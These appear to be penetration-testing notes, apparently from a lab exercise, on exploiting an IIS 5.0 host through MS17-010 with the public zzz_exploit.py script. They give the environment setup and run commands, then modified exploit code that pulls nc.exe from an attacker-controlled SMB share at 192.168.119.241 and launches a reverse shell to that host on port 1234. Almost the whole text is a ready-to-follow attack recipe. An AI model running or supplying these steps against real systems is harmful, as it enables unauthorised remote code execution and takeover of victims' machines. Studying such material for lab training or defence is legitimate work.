IIS 5.0
In order to exploit an IIS 5.0 server the zzz_exploit.py script that is to be found here: MS17-010 is the best choice, first of all we need to create a virtual environment with python as this script use impacket that must be installed with python2, for this reason we need to follow this steps to create it:
1) Specify the python version
1
virtualenv -p /usr/bin/python2.7 venv
2) Activate the virtual environment:
1
source venv/bin/activate
3) Install the impacket repository:
1
pip install impacket
In order to execute the script, the following command is needed:
1
python2 zzz_exploit.py 10.11.1.227
By default, the exploit will only create a file under C:\ called pwned.txt, as shown in the following lines of code of the exploit:
1
2
3
4
5
6
7
8
9
10
11
12
13
def smb_pwn(conn, arch):
smbConn = conn.get_smbconnection()
print('creating file c:\\pwned.txt on the target')
tid2 = smbConn.connectTree('C$')
fid2 = smbConn.createFile(tid2, '/pwned.txt')
smbConn.closeFile(tid2, fid2)
smbConn.disconnectTree(tid2)
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
# Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..."
If we need a reverse shell on the server we first need to upload a nc.exe binary, the easiest way to do it is using an smb share folder with impacket on Kali:
1
impacket-smbserver shareFolder $(pwd) -smb2support
A slight modification must be made to copy the file on the victim machine, by copying the file from the SMB Shared Folder to the victim machine:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
def smb_pwn(conn, arch):
smbConn = conn.get_smbconnection()
print('creating file c:\\pwned.txt on the target')
tid2 = smbConn.connectTree('C$')
# fid2 = smbConn.createFile(tid2, '/pwned.txt')
service_exec(conn, r'cmd /c copy \\192.168.119.241\shareFolder\nc.exe nc.exe')
smbConn.closeFile(tid2, fid2)
smbConn.disconnectTree(tid2)
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
# Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..."
Finally, we can bring up a nc connection as normal as follows:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
def smb_pwn(conn, arch):
smbConn = conn.get_smbconnection()
print('creating file c:\\pwned.txt on the target')
tid2 = smbConn.connectTree('C$')
# fid2 = smbConn.createFile(tid2, '/pwned.txt')
# service_exec(conn, r'cmd /c copy \\192.168.119.241\shareFolder\nc.exe nc.exe')
service_exec(conn, r'cmd /c nc.exe -e cmd.exe 192.168.119.241 1234')
smbConn.closeFile(tid2, fid2)
smbConn.disconnectTree(tid2)
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
# Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..."